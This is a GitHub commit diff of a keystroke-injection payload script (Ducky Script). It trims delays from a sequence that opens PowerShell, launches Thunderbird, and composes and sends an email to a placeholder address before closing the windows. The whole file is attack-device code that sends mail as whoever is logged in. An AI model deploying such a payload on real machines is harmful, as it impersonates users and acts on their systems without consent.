Update payload.txt

pull/160/head
Kalani Helekunihi 2023-06-12 14:24:01 -04:00 committed by GitHub
parent c6819b3b9c
commit 9e2045708f
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 14 deletions

View File

@ -27,14 +27,11 @@ DEFINE SUBJECT example
REM REQUIRED - Set email message REM REQUIRED - Set email message
DEFINE MESSAGE example DEFINE MESSAGE example
DEFAULT_DELAY 1000
REM # PowerShell REM # PowerShell
DELAY 1000
GUI r GUI r
DELAY 1000
STRING powershell STRING powershell
ENTER ENTER
DELAY 2000
STRINGLN Start-Process "thunderbird.exe" STRINGLN Start-Process "thunderbird.exe"
DELAY 4000 DELAY 4000
@ -42,23 +39,14 @@ REM # Thunderbird
CTRL n CTRL n
DELAY 2000 DELAY 2000
STRING EMAIL-ADDRESS STRING EMAIL-ADDRESS
DELAY 500 REPEAT 2 TAB
TAB
DELAY 500
TAB
DELAY 500
STRING SUBJECT STRING SUBJECT
DELAY 500
TAB TAB
DELAY 500
STRING MESSAGE STRING MESSAGE
DELAY 500
CTRL ENTER CTRL ENTER
DELAY 2000 DELAY 2000
ENTER ENTER
REM # End actions REM # End actions
DELAY 2000
ALT F4 ALT F4
DELAY 1000
ALT F4 ALT F4